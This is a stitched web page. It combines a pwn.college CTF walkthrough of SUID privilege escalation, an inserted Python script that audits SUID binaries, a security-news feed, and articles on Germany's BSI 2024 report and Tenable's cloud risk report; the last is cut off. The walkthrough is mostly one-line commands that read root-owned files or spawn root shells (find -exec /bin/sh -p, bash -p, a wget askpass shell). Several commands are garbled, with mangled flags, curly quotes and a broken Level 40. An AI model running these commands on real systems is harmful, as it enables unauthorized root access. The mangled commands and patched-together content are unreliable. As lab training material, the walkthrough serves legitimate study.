SUID Exploits Uncovered: A Step-by-Step Privilege Escalation Guide
How to Read Sensitive Files with SUID Set on Commands and How to Escalate Privilege
Introduction to Pwn College
pwn.college is an online platform that offers training modules for cybersecurity professionals. It helps students and others learn about and practice core cybersecurity concepts. Pwn.college is an education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. In martial arts terms, it is designed to take a "white belt" in cybersecurity to becoming a "blue belt", able to approach (simple) CTFs and wargames. Our philosophy is "practice makes perfect". The platform is maintained by an awesome team of hackers at Arizona State University. It powers much of ASU's cybersecurity curriculum, and is open, for free, to participation for interested people around the world!
pwn.college Program Misuse: Privilege Escalation
Level 1: If SUID bit on /usr/bin/cat
The 'cat' command is commonly used to display the contents of a file. In this scenario, the SUID bit is set on 'cat', enabling us to read the /flag file, which is owned by root.
cat /flag
Level 2: If SUID bit on /usr/bin/more
The 'more' command is used to view the contents of a file page by page. Here, we read the /flag file, leveraging the SUID bit set on 'more' to access a file owned by root.
more /flag
Level 3: If SUID bit on /usr/bin/less
Similar to 'more', 'less' is a command-line pager for viewing files interactively. Here, we read the /flag file using 'less' with the SUID bit set, accessing a file owned by root.
less /flag
Level 4: If SUID bit on /usr/bin/head
The 'head' command displays the first lines of a file. Here, we read the /flag file with the SUID bit set on 'head', accessing a file owned by root.
head /flag
Level 5: If SUID bit on /usr/bin/tail
Used to display the last few lines of a file, 'tail' is applied here to read the contents of the /flag file. The SUID bit is set on 'tail', giving access to a file owned by root.
tail /flag
Level 6: If SUID bit on /usr/bin/sort
Sorting the lines of a file is a common task for the 'sort' command. We read the /flag file by using 'sort' with the SUID bit set on a file owned by root.
sort /flag
Level 7: If SUID bit on /usr/bin/vim
The 'vim' text editor is invoked to open and edit files. Here, we open the /flag file in 'vim' with the SUID bit set, accessing a file owned by root.
vim /flag
Level 8: If SUID bit on /usr/bin/emacs
As a powerful text editor, 'emacs' is used here to open and modify files. We read the /flag file using 'emacs' with the SUID bit set, accessing a file owned by root.
emacs /flag
Level 9: If SUID bit on /usr/bin/nano
A user-friendly text editor, 'nano' is used to open and edit files. Here, we read the /flag file using 'nano' with the SUID bit set, accessing a file owned by root.
nano /flag
Level 10: If SUID bit on /usr/bin/rev
Reversing the content of a file is done with the 'rev' command. Here, we reverse the /flag file's content twice using 'rev' with the SUID bit set, so the original text is displayed.
rev /flag | rev
Level 11: If SUID bit on /usr/bin/od
The 'od' command displays an octal dump of a file. We read the /flag file using 'od' with the SUID bit set, accessing a file owned by root.
od /flag
Level 12: If SUID bit on /usr/bin/hd
For a hexadecimal dump of a file, the 'hd' command is used. Here, we read the /flag file using 'hd' with the SUID bit set, accessing a file owned by root.
hd /flag
Level 13: If SUID bit on /usr/bin/xxd
Generating a hexadecimal dump with line annotations, 'xxd' is used here to read the /flag file. The SUID bit is set on 'xxd', allowing access to a file owned by root.
xxd /flag
Level 14: If SUID bit on /usr/bin/base32
Base32 encoding and decoding is performed with the 'base32' command. Here, we encode and then decode the /flag file to read its contents.
base32 /flag | base32 -d
Level 15: If SUID bit on /usr/bin/base64
Base64 encoding and decoding is performed with the 'base64' command. Here, we encode and then decode the /flag file to read its contents.
base64 /flag | base64 -d
Level 16: If SUID bit on /usr/bin/split
The 'split' command splits files into pieces. We split the /flag file into another file and view that file with the 'cat' command.
split /flag
ls
cat FILENAME_THAT_IS_GENERATED
Level 17: If SUID bit on /usr/bin/gzip
'gzip' is a tool to compress and decompress files. Here, we compress the flag and decompress it again to view the contents.
gzip -c /flag | gzip -d
Level 18: If SUID bit on /usr/bin/bzip2
'bzip2' is a tool to compress and decompress files. Here, we compress the flag and decompress it again to view the contents.
bzip2 -c /flag | bzip2 -d
Level 19: If SUID bit on /usr/bin/zip
Creating a zip archive of a file is done with the 'zip' command. We create a zip archive of the /flag file using 'zip' with the SUID bit set, accessing a file owned by root, and then print the archive.
zip flag.zip /flag && cat flag.zip
Level 20: If SUID bit on /usr/bin/tar
The 'tar' command is used to create and manipulate tar archives. Here, we create a tar archive of the /flag file using 'tar' with the SUID bit set, accessing a file owned by root, and then print the archive.
tar -cf flag.tar /flag && cat flag.tar
Level 21: If SUID bit on /usr/bin/ar
Creating and managing ar archives is done with this command. We create an ar archive of the /flag file, using the SUID bit set on 'ar' to access a file owned by root, and then print the archive.
F=$(mktemp -u) && ar r "$F" /flag && cat "$F"
Level 22: If SUID bit on /usr/bin/cpio
The 'find' command locates files, and 'cpio' is used for archive creation. We create a cpio archive of the /flag file using 'find' and 'cpio' with the SUID bit set, accessing a file owned by root, and then print the archive.
find /flag | cpio -o > flag.cpio && cat flag.cpio
Level 23: If SUID bit on /usr/bin/genisoimage
For creating ISO images, the 'genisoimage' command is used. Here, we pass the /flag file to 'genisoimage' with the SUID bit set, accessing a file owned by root.
genisoimage -sort /flag
Level 24: If SUID bit on /usr/bin/env
The 'env' command sets the environment for a command. Here, we use 'env' to execute 'cat' and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
env cat /flag
Level 25: If SUID bit on /usr/bin/find
The 'find' command is used with the '-exec' option to execute commands on found files. We execute a shell with root privileges and then display the /flag file after gaining root access.
find . -exec /bin/sh -p \;
cat /flag
Level 26: If SUID bit on /usr/bin/make
The 'make' command builds and maintains programs. Here, we use 'make' to execute 'cat' and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
make -s --eval=$'x:\n\t-'"cat /flag"
Level 27: If SUID bit on /usr/bin/nice
The 'nice' command alters the scheduling priority of a command. We execute 'cat' through 'nice' to display the /flag file with the SUID bit set, accessing a file owned by root.
nice cat /flag
Level 28: If SUID bit on /usr/bin/timeout
The 'timeout' command sets a time limit on the execution of a command. Here, we use 'timeout' to run 'cat' and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
timeout 1 cat /flag
Level 29: If SUID bit on /usr/bin/stdbuf
The 'stdbuf' command adjusts buffering options for a command. Here, we use 'stdbuf' to run 'cat' with unbuffered input, displaying the contents of the /flag file with the SUID bit set, accessing a file owned by root.
stdbuf -i0 cat /flag
Level 30: If SUID bit on /usr/bin/setarch
The 'setarch' command sets the architecture for a command. We use 'setarch' to execute 'cat' and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
setarch $(arch) cat /flag
Level 31: If SUID bit on /usr/bin/watch
The 'watch' command repeats a command at specified intervals. Here, we use 'watch' to repeatedly execute 'cat' and display the contents of the /flag file with the SUID bit set, accessing a file owned by root.
watch -x cat /flag
Level 32: If SUID bit on /usr/bin/socat
Socat is a versatile relay tool. We transfer the contents of the /flag file to standard output using 'socat' with the SUID bit set, accessing a file owned by root.
socat -u /flag -
Level 33: If SUID bit on /usr/bin/whiptail
Whiptail is a dialog-box-driven interface. Here, we use 'whiptail' to display the contents of the /flag file in a text box with the specified dimensions, accessing a file owned by root.
whiptail --textbox /flag 10 30
Level 34: If SUID bit on /usr/bin/awk
The 'awk' command is used for pattern scanning and processing. Here, we use 'awk' with an empty pattern to display the contents of the /flag file.
awk '//' /flag
Level 35: If SUID bit on /usr/bin/sed
The 'sed' command is a stream editor. Here, we use 'sed' with an empty script to display the contents of the /flag file.
sed '' /flag
Level 36: If SUID bit on /usr/bin/ed
The 'ed' editor is employed for line-oriented text editing.
Trying to use ‘ed’ to print the contents of the /flag file ed /flag CN #Then type p to print flag and q to quit Level 37: If SUID bit on /usr/bin/chown The ‘chown’ command changes file ownership. Here, we attempt to change the ownership of the /flag file to ‘hacker’ and display its contents chown hacker /flag && cat /flag Level 38: If SUID bit on /usr/bin/chmod The ‘chmod’ command modifies file permissions. In this instance, we attempt to change the permissions of the /flag file to allow read and write access for all users, and then display its contents chmod 666 /flag && cat /flag Level 39: If SUID bit on /usr/bin/cp Copying the /flag file to the current directory is done with the ‘cp’ command. We try to copy the /flag file without the permissions. cp — no-preserve=all /flag . && cat flag Level 40: If SUID bit on /usr/bin/mv The ‘mv’ command is used to move (rename) files. Here we are moving the code of ‘cat’ to the ‘mv’ tool. Now, if we use the ‘mv’ command it will display the contents of the file like ‘cat’. Then we are running the /challenge/babysuid_level40 to set SUID on mv and we can read the contents of the /flag file. mv /usr/bin/cat /usr/bin/mv || ./challenge/babysuid_level40 || mv /flag | grep pwn.college{ Level 41: If SUID bit on /usr/bin/perl The ‘perl’ command is used for text processing. Here, we attempt to use ‘perl’ to display the contents of the /flag file. perl -pe ‘END { close ARGV }’ /flag Level 42: If SUID bit on /usr/bin/python We are trying to run /flag file with python, which throws an error that contains the flag string. You can also try to write a program that reads the content of the /flag file. python /flag Level 43: If SUID bit on /usr/bin/ruby Creating and running a Ruby script to display the contents of the /flag file is done here with ‘echo’ and ‘ruby’ echo “puts File.read(‘/flag’)” >> a.rb && ruby a.rb CN Level 44: If SUID bit on /usr/bin/bash Executing bash with privileged mode is attempted here. 
After that, we try to use ‘cat’ to display the contents of the /flag file bash -p CN then cat /flag Level 45: If SUID bit on /usr/bin/date The ‘date’ command is typically used for displaying or setting the system date and time. Here, we attempt to use ‘date’ to display the contents of the /flag file. We have to input a datefile for this command but if we give wrong file it will throw an error with the contents of the file. date -f /flag Level 46: If SUID bit on /usr/bin/dmesg The ‘dmesg’ command displays kernel messages. Here, we attempt to use ‘dmesg’ to display the contents of the /flag file dmesg -F /flag Level 47: If SUID bit on /usr/bin/wc The ‘wc’ command is used for word counting. Here, we try to use ‘wc’ to count words in the /flag file specified in a null-terminated list wc — files0-from=/flag Level 48: If SUID bit on /usr/bin/gcc The ‘gcc’ command is a compiler for programming languages. In this scenario, we attempt to preprocess the /flag file using ‘gcc’ with specific flags gcc -x c -E /flag Level 49: If SUID bit on /usr/bin/as The ‘as’ command is an assembler for programming languages. Here, we try to use ‘as’ to assemble the /flag file to display its contents as /flag Level 50: If SUID bit on /usr/bin/wget This command creates a temporary executable script file using mktemp, sets execute permissions, and writes a simple shell script into it. The script is designed to execute /bin/sh with a specific set of options. Finally, it uses wget to download a file, passing the created script as the askpass program, allowing for potential privilege escalation or unauthorized access. Then we can read the /flag file using cat /flag F=$(mktemp) && chmod +x $F && echo -e ‘#!/bin/sh -p\n/bin/sh -p 1>&0’ >$F && wget — use-askpass=$F 0 cat /flag Level 51: If SUID bit on /usr/bin/ssh-agent Thank you for Reading!! Happy Hunting ~ Author: Karthikeyan Nagaraj ~ Cyberw1ng
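As an added check that is not part of the walkthrough above: the Python script below enumerates SUID/SGID binaries on a host and flags the ones whose program name matches a tool the levels above abuse. The name list mirrors the levels, the versioned-name matching (python3.11, gcc-12) is an assumption about how distributions name interpreters and compilers, and the sample inventory is constructed here so the logic can be exercised offline; the live walk over / is only meaningful on the host being audited.

```python
#!/usr/bin/env python3
"""Added audit script, not part of the walkthrough above: find SUID/SGID
binaries on a host and flag the ones whose names match programs the levels
above abuse. The name list mirrors the walkthrough; the sample inventory is
constructed for the offline demo."""
import os
import re
import stat
from typing import Iterable, Iterator, List

# Program names that the walkthrough shows being abused once they are SUID.
RISKY_SUID_NAMES = frozenset("""
head tail sort vim emacs nano rev od hd xxd base32 base64 split gzip bzip2 zip
tar ar cpio genisoimage env find make nice timeout stdbuf setarch watch socat
whiptail awk sed ed chown chmod cp mv perl python ruby bash date dmesg wc gcc as
wget ssh-agent
""".split())

# Versioned names such as python3.11, perl5.36.0 or gcc-12 map to their base name
# (assumed naming convention, not something the walkthrough states).
_VERSIONED = re.compile(r"^([a-z+]+?)-?[0-9.]*$")


def canonical_name(basename: str) -> str:
    """'python3.11' -> 'python', 'gcc-12' -> 'gcc', 'base64' stays 'base64'."""
    if basename in RISKY_SUID_NAMES:
        return basename
    m = _VERSIONED.match(basename)
    if m and m.group(1) in RISKY_SUID_NAMES:
        return m.group(1)
    return basename


def is_risky(path: str) -> bool:
    """True when the program at path is one the walkthrough abuses."""
    return canonical_name(os.path.basename(path)) in RISKY_SUID_NAMES


def is_setid(mode: int) -> bool:
    """True for a regular file whose mode carries the SUID or SGID bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid_files(root: str = "/") -> Iterator[str]:
    """Live check: walk the tree and yield regular files with SUID/SGID set."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue
            if is_setid(st.st_mode):
                yield path


def flag_risky(paths: Iterable[str]) -> List[str]:
    """Subset of paths whose program name appears in the walkthrough, sorted."""
    return sorted(p for p in paths if is_risky(p))


# Constructed sample inventory (not captured from a real host).
SAMPLE_SETID_PATHS = [
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/find",
    "/usr/bin/python3.11",
    "/usr/bin/base64",
    "/usr/lib/openssh/ssh-keysign",
]

if __name__ == "__main__":
    print("risky in sample:", flag_risky(SAMPLE_SETID_PATHS))
    # Live audit of this host; needs read access to the tree being walked.
    for path in flag_risky(find_setid_files("/")):
        print("REVIEW:", path)
```

On the constructed sample the script flags /usr/bin/find, /usr/bin/python3.11 and /usr/bin/base64 and leaves passwd, sudo and ssh-keysign alone, since those are SUID by design and are not in the walkthrough's list; a real audit would still review every SUID file, with this list only deciding what gets looked at first.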
by HACKLIDO
2024-11-14 15:06:57
Researcher Infected Hackers with Fake “JINN Ransomware” BuilderCristian Cornea, a cybersecurity expert, devised a clever honeypot trap to ensnare hackers using a fake ransomware builder. Cornea’s “Jinn Ransomware Builder,” while appearing to offer all the tools necessary to launch custom ransomware attacks, was actually backdoored, designed to collect the information of would-be cybercriminals who tried to use it. The Jinn Ransomware Builder … The post Researcher Infected Hackers with Fake “JINN Ransomware” Builder appeared first on CyberInsider.
by Cyber Insider
2024-11-14 15:05:00
What is multi-step reasoning?Multi-step reasoning is a concept that is taught in grade school math class, but it applies far beyond mathematical calculations... The post What is multi-step reasoning? appeared first on Sysdig.
by Sysdig
2024-11-14 15:00:00
Cyber Risk Lessons We Can Learn From Hurricane PreparednessRisk is real. To better understand cybersecurity risk, let’s compare cyber risks to risks in the natural world from hurricanes. We can learn lessons from hurricanes and unnamed storms in […] The post Cyber Risk Lessons We Can Learn From Hurricane Preparedness appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-11-14 15:00:00
Washington's Cybersecurity Storm of ComplacencyIf the government truly wants to protect the US's most vital assets, it must rethink its cybersecurity policies and prioritize proactive, coordinated, and enforceable measures.
by Dark Reading
2024-11-14 15:00:00
[World Premiere] KnowBe4 Debuts New Season 6 of Netflix-Style Security Awareness Video Series - “The Inside Man”We’re thrilled to announce the long-awaited sixth season of the award-winning KnowBe4 Original Series - “The Inside Man” is now available in the KnowBe4 ModStore!
by KnowBe4
2024-11-14 14:41:35
Malware Spotlight: A Deep-Dive Analysis of WezRatKey Findings: Introduction On October 30th, the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory regarding recent activities of the Iranian cyber group Emennet Pasargad. The group recently operated under the name Aria Sepehr Ayandehsazan (ASA) and is affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). […] The post Malware Spotlight: A Deep-Dive Analysis of WezRat appeared first on Check Point Research.
by Check Point Research
2024-11-14 14:25:03
New educational campaign “Flex Your Cyber” launchedAs technology has become an integral part of the learning environment, empowering robust cybersecurity practices in primary and secondary education is now essential. In response to this urgent need, Keeper Security – with support from the National Cybersecurity Alliance (NCA), KnowBe4 and Williams Racing Formula 1 team – has announced the launch of Flex Your […] The post New educational campaign “Flex Your Cyber” launched appeared first on IT Security Guru.
by IT Security Guru
2024-11-14 14:00:00
What’s new in Cloudflare: Account Owned Tokens and Zaraz Automated ActionsCloudflare customers can now create Account Owned Tokens , allowing more flexibility around access control for their Cloudflare services. Additionally, Zaraz Automation Actions streamlines event tracking and third-party tool integration.
by Cloudflare
2024-11-14 14:00:00
Autonomous security for cloud in AWS: Harnessing the power of AI for a secure futureAs the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is where the idea of autonomous security for cloud (ASC) comes into play. Security and compliance […] The post Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future appeared first on Security Intelligence.
by Security Intelligence
2024-11-14 13:41:15
Massive data leak in Switzerland – Le TempsIn May 2023, a planet-wide cyberattack compromised the information of 7.9 million employees across 27 multinationals, including giants such as Amazon, HSBC and Lenovo, but also two major Swiss companies: UBS and DSM-Firmenich. The post Massive data leak in Switzerland – Le Temps appeared first on ZENDATA Cybersecurity.
by Zendata
2024-11-14 13:17:20
Advertisers are pushing ad and pop-up blockers using old tricksA malvertising campaign using an old school trick was found pushing to different ad blockers.
by Malwarebytes Labs
2024-11-14 13:06:17
Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience
Germany’s Federal Office for Information Security (BSI) recently released The State of Cybersecurity 2024 report, which illuminates the critical threats and advances in resilience across Germany’s digital landscape. In a joint press briefing, Federal Minister of the Interior Nancy Faeser and BSI President Claudia Plattner said that while the cyberthreat landscape remains tense, resilience measures are proving effective in protecting businesses, institutions, and democratic processes.
Federal Minister Nancy Faeser noted the importance of cybersecurity for societal stability, stating, “Cybersecurity is central to our society and affects each and every one of us.” She highlighted that extortion, cyber espionage, and hybrid threats—especially from state-sponsored actors—continue to pose significant risks, necessitating robust cybersecurity investments to safeguard democratic institutions.
BSI President Claudia Plattner reinforced this stance, noting that Germany has witnessed increased resilience against cyber threats. However, she warned against complacency: “We must continue to increase our resilience in a nationwide effort.” Both leaders stressed the importance of swiftly incorporating the NIS-2 Directive into national law to fortify Germany’s cyber defenses.
Key Findings from BSI’s 2024 Report
Rising Threats from Malware and Ransomware Attacks
Between mid-2023 and mid-2024, an alarming increase in malware variants was recorded, with an average of 309,000 new variants discovered daily—a 26% increase over the previous year. Much of this rise is attributed to attacks targeting 64-bit Windows systems and an above-average increase in Android malware.
Figure 1 - Rising threats in Germany’s cyber threat landscape (Source: BSI)
Ransomware continues to be a significant challenge, especially for businesses and government institutions. Data leaks following ransomware attacks have increased, although the percentage of victims paying ransom has dropped. LockBit leads the list of the five most active groups targeting Germany. The group published 40 alleged leak victims on its leak site during the reporting period, followed by BlackBasta and 8Base.
Figure 2 - Top 5 leak pages from July 2023 to June 2024 (Source: BSI)
Many organizations now rely on robust backup systems, reducing their dependency on attackers to restore encrypted data. BSI observed that transparent communication about cyber incidents has helped mitigate potential impacts, as other organizations can swiftly address and close similar vulnerabilities.
Advanced Persistent Threats (APT) and Cyber Espionage
Germany noted the surge in persistent threats from Advanced Persistent Threat (APT) groups, many of which are state-sponsored. Against a backdrop of geopolitical tension, these groups are increasingly targeting political parties, governmental agencies, and corporations for cyber espionage. Germany urged its public and private sectors to adopt proactive threat intelligence and protective measures to defend against these sophisticated, continuous attacks.
Cybersecurity for Elections: Ensuring Democratic Integrity
For German citizens, not only the European elections but also three state elections in Saxony, Thuringia, and Brandenburg and nine local elections took place. The BSI said the electoral process, communication by the authorities and the media, and the formation of opinion and will in the context of elections are now highly dependent upon information technology and are, therefore, at the center of information security. BSI provided dedicated security oversight, working with electoral authorities to protect the integrity of the voting process. As Germany heads toward future elections, the BSI has enhanced its monitoring and support for political entities, prioritizing resilience against potential cyber threats and disinformation campaigns from state actors.
Emerging Cybersecurity Challenges
Increase in High-Volume DDoS Attacks
The first half of 2024 saw a substantial uptick in Distributed Denial of Service (DDoS) attacks, with a marked increase in high-volume attacks exceeding 10,000 Mbps. DDoS attacks not only disrupt services but are increasingly used to sow public uncertainty by exaggerating their impact on social media.
Figure 3 - Proportion of high-bandwidth DDoS attacks doubled in April 2024 (Source: BSI)
The BSI recommends adopting advanced DDoS mitigation strategies, particularly for critical infrastructure, to withstand these escalating attack volumes.
Data Theft Targeting Consumers
Phishing remains a major threat to German citizens, with attackers expanding beyond financial institution impersonation to include popular streaming services. During 2024, phishing campaigns have increasingly targeted user data—such as credit card information and personal identifiers—via emails masquerading as communications from banks and entertainment platforms. The BSI advises consumers to stay vigilant and adopt robust identity protection measures to counter phishing attempts.
Strategic Initiatives to Strengthen Cyber Resilience
Cybernation Germany Initiative
The Cybernation Germany initiative, launched in early 2024, is a step towards a national commitment to building resilience and expanding Germany’s cybersecurity expertise. The initiative’s goals align with the NIS-2 Directive and the Cyber Resilience Act (CRA), which impose mandatory cybersecurity measures and incident reporting standards for companies. The CRA emphasizes a “security by design” approach, particularly for IoT devices, to bolster protections across interconnected networks. This initiative demonstrates a concerted push from Germany towards enhanced threat intelligence, cyber resilience, and protective infrastructure.
Key Recommendations from BSI for Strengthening Cybersecurity
Governance and Risk-Based Policies: Organizations should maintain updated, approved cybersecurity policies, leveraging threat intelligence to refine policies and prioritize high-risk threats.
Enhanced Monitoring and Detection: With the rise in malware and ransomware, BSI recommends integrating Security Operations Centers (SOC) with continuous threat detection and red teaming exercises to effectively simulate real-world scenarios.
Incident Response and Recovery: BSI encourages organizations to establish structured Incident Response plans, supported by Cyber Threat Intelligence (CTI), to reduce response times and facilitate efficient recovery from cyber incidents.
Increased Public Awareness and Resilience Measures: Awareness campaigns, employee training, and enhanced communication strategies have proven effective in helping organizations and consumers defend against phishing and ransomware attacks.
Collaboration with International Security Standards: Adhering to NIS-2 and the Cyber Resilience Act ensures that German entities align with European cybersecurity standards, enhancing cross-border protections and maintaining consistent security measures across sectors.
Conclusion: A Proactive Path Forward
The BSI’s 2024 report reaffirms Germany’s proactive approach to cybersecurity, emphasizing resilience, regulatory compliance, and advanced threat intelligence. With heightened preparedness across government, businesses, and society, Germany is well-positioned to defend against increasingly sophisticated cyber threats. However, as Minister Faeser stated, the evolving cyber threat landscape necessitates continuous investment and adaptation to safeguard Germany’s critical infrastructure and democratic systems. Germany’s Cybernation initiative and collaboration with international cybersecurity frameworks hint at a robust defense strategy that other nations can use as a model. By maintaining proactive measures, aligning with global security standards, and fostering a culture of resilience, Germany aims to ensure cybersecurity remains integral to its digital and democratic future.
References:
https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2024/241112_Lagebericht_2024.html
https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html
The post Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience appeared first on Cyble.
by CYBLE
2024-11-14 13:00:00
Microsoft Power Pages Leak Millions of Private RecordsLess-experienced users of Microsoft's website building platform may not understand all the implications of the access controls in its low- or no-code environment.
by Dark Reading
2024-11-14 12:46:53
Organizations face mounting pressure to accelerate AI plans, despite lack of ROIBusinesses are prioritizing their investments in AI, but lack the necessary infrastructure and gains from their deployments.
by ZDNET Security
2024-11-14 12:46:18
How to make any password manager your autofill service on AndroidUsing a third-party password manager? Here's why you'll want to set the autofill option for the right app.
by ZDNET Security
2024-11-14 12:34:56
Scammer robs homebuyers of life savings in $20 million theft spreeA scammer was caught after they defrauded some 400 people for almost $20 million in real estate.
by Malwarebytes Labs
2024-11-14 12:23:26
Pro-Hezbollah accounts orchestrated digital smear campaign against Lebanese journalistsThe X campaign sought to discredit five Lebanese media workers with edited media, gender-based violence, and threats The post Pro-Hezbollah accounts orchestrated digital smear campaign against Lebanese journalists appeared first on DFRLab.
by DFRLab
2024-11-14 12:19:00
Who’s Afraid of a Toxic Cloud Trilogy?
The Tenable Cloud Risk Report 2024 reveals that nearly four in 10 organizations have workloads that are publicly exposed, contain a critical vulnerability and have excessive permissions. Here’s what to watch for in your organization.
In a “GPS mapping” of today’s most pressing cloud security issues, the Tenable Cloud Risk Report 2024 from Tenable Cloud Research revealed serious flaws across workloads, identities, containers, storage and Kubernetes.
Particularly concerning was the discovery that nearly four in 10 organizations (38%) have an elevated level of exposure from workloads bearing an especially risky blend of security gaps. We called this blend a “toxic cloud trilogy,” defined as any cloud workload having these three risk factors: a critical vulnerability, excessive permissions and public exposure.
Like the big bad wolf in the Little Red Riding Hood fable, a toxic cloud trilogy masks its existence and severity in the cloud environment. The masking makes these high risks hard to spot, prioritize and remediate. In this blog we discuss the implications of the toxic cloud trilogy and offer guidance for actions to avoid them.
Why we conducted this research
To help our customers — and ourselves — better understand the most prevalent risks in cloud environments, the Tenable Cloud Research team analyzed telemetry from millions of cloud resources in active production across multiple public cloud repositories. Conducted in the first half of 2024, the research included cloud workload and configuration information. To determine the most exploitable vulnerabilities the team applied Tenable’s Vulnerability Priority Rating (VPR) to common cloud CVEs.
Why a toxic cloud trilogy increases risk
A toxic cloud trilogy increases risk by making the workload’s weaknesses easier for attackers to exploit — and making the scope of exploitation potentially greater.
Cloud security involves layers of defense to prevent breaches if a given layer fails; a toxic trilogy effectively erodes these layers. Bad actors seek out critical vulnerabilities or publicly accessible assets. Finding one, they can commandeer highly privileged permissions or roles to burrow their way in, accessing — and even exfiltrating — sensitive data. For example, an attacker can modify access policies or elevate privileges, moving laterally and deploying resources to gain access to even more sensitive areas.
Prevalence of toxic cloud trilogies in organizations worldwide (Source: Tenable Cloud Risk Report 2024, October 2024)
The work of mitigating toxic cloud trilogies needs to be high on a security team’s “to do” list. That’s easier said than done. Let’s explore the challenges organizations face in addressing such exposures.
Organizational causes of toxic cloud trilogies
How are such risky combinations getting through? Fault lines can be organizational, due to siloed tooling that limits visibility. Another contributing factor is the distributed ownership of systems, spanning development, IT and cybersecurity teams, among others. Each of these teams may have a different level of risk appetite.
Here are three examples of how these factors contribute to the creation of toxic cloud trilogies:
Didn’t see it. Siloed tooling looks for specific kinds of flaws. It can create false positives that don’t show the full context of an identified exposure, such as a vulnerability not being in runtime and so not exploitable.
Will the cloud risk owner please stand up? Depending on the organization — its size and organizational structure — many roles may play a part in managing cloud risk. You’d need to have a holistic view to catch a toxic trilogy.
Risk hungry? The National Institute of Standards and Technology (NIST) defines cyber risk appetite as “The types and amount of risk, on a broad level, an organization is willing to accept in its pursuit of value.” While an organization may have its strategic risk appetite clearly spelled out, different teams with conflicting business goals may make compromises in implementation that clear the way for toxic cloud trilogies.
Why toxic cloud trilogy factors persist in organizations
Let’s take a closer look at each factor implicated in a toxic cloud trilogy and why these issues can be so difficult for organizations to address.
Critical vulnerabilities
Attackers abuse cloud vulnerabilities — flaws in cloud-based software — to gain unauthorized access, steal sensitive data and/or disrupt services. You would expect published CVEs to be easy, low-hanging fruit for cybersecurity teams to act on quickly. Doing so prevents or dismantles a toxic cloud trilogy. Yet, to our surprise, many high risk vulnerabilities in the data we examined remained unremediated even a month after a CVE was published.
High risk vulnerabilities remained largely unremediated after 30 days.
Why does remediating a vulnerability take so much time? One reason may be that, regardless of who technically “owns” vulnerability management in the organization, it requires the involvement of several teams. Depending on the organization’s structure, those involved in the process of remediating vulnerabilities could include security teams alerting vulnerability management teams, applications teams issuing software update requests of operating systems teams and DevSecOps teams needing to make related changes in CI/CD pipelines.
Another “drag” factor in resolving vulnerabilities may be tactical: teams see vulnerability remediation as time-consuming, requiring an arbitrary cycle of tasks. Adopting conventional wisdom, they may try to save cycles by taking a “batch the patch” approach: delaying the fix until every relevant patch is available. While this approach is understandable from a time management perspective, it places operational efficiency above security.
Excessive permissions
Attackers target credentials, putting identity and access management (IAM) on the radar of everyone responsible for securing the cloud. Overprivileged human identities are a known, high-impact risk factor in identity-based attacks. Overprivileged non-human identities are the key impact factor in breaches based on application vulnerabilities. All are part of the same IAM system.
87% of human identities in AWS have critical or high excessive permissions
Our research revealed extensive instances of excessive permissions in both human and non-human identities. We also found that human identities are granted significantly more risky excessive permissions than non-human identities. For example, in the Amazon Web Services (AWS) permissions we studied, the vast majority had excessive critical and high risk permissions.
Human and non-human identity permissions in AWS (Source: Tenable Cloud Risk Report 2024, October 2024)
Avoiding risky permissions is a cloud security best practice, and also, in many cases, a compliance requirement, achieved by acting on least privilege implementation.
At the helm of permissions and access management are the IAM teams. Aided by no shortage of cloud provider and third-party tools — including AWS IAM, Microsoft Azure Active Directory, Google Cloud Platform (GCP) IAM, AWS IAM Access Analyzer, Azure Privileged Identity Management (PIM), Okta and Auth0 — they work to create and maintain access permissions structures and policies, and apply least privilege to the extent possible.
Security teams, on the other hand, are at another helm, and using other tools, to spot exposures. They are looking not only at permissions but also workloads, data, applications and infrastructure as a whole. This broader approach informs security teams about permissions-related risks as well as granular policy refinements that enforce least privilege, including when elevated permissions should be granted but limited by time.
By design, IAM tools lack full stack and even multi-cloud entitlements context; they may recommend least privilege yet from a narrow permissions and policy lens. They are unable to bring into focus access risk that feeds into a vulnerability or resource to create a toxic cloud trilogy.
IT and security leaders need to enable their IAM and security teams to work closely with each other. Do they?
And why are human identities more likely to be assigned excessive privileges? In some cases, project managers prevail upon their IT colleagues to elevate privileges for an urgent business need. Note, too, that developers may be using programmatic, IAM role-based templates to define access for non-human identities.
Public exposure
The phrase “public exposure” conjures up an actor performing before an audience. In cloud infrastructure, public assets — databases, websites, email servers and other online services — are just that: exposed to external networks so legitimate parties outside the organization can access them.
Risk increases when assets are unintentionally public with either excessive permissions and/or a vulnerability. Worse is when the asset contains sensitive data. Organizations need to be able to examine whether an asset is configured as public. In the case of publicly exposed cloud storage, they need to be able to discover and classify sensitive data contained within, including who can access it and how it is used, so any remediation measures can be prioritized accordingly.
29% of organizations have public-facing storage buckets
Our research found that 96% of organizations have public-facing cloud assets; 29% of organizations have public-facing storage buckets. It is essential to know if this exposure is due to a misconfiguration, such as an unpatched resource or overprivileged access. If oversight is at play, it may be due to business drivers such as time to market or lack of cloud security personnel, or the need to implement guardrails, policies or visibility. Context and tools are needed to be able to monitor and close such exposure, and downgrade permissions to the minimum needed.
Key actions to prevent toxic cloud trilogies
Taking a few key actions can prevent toxic cloud trilogies in your cloud environment. Here’s what we recommend:
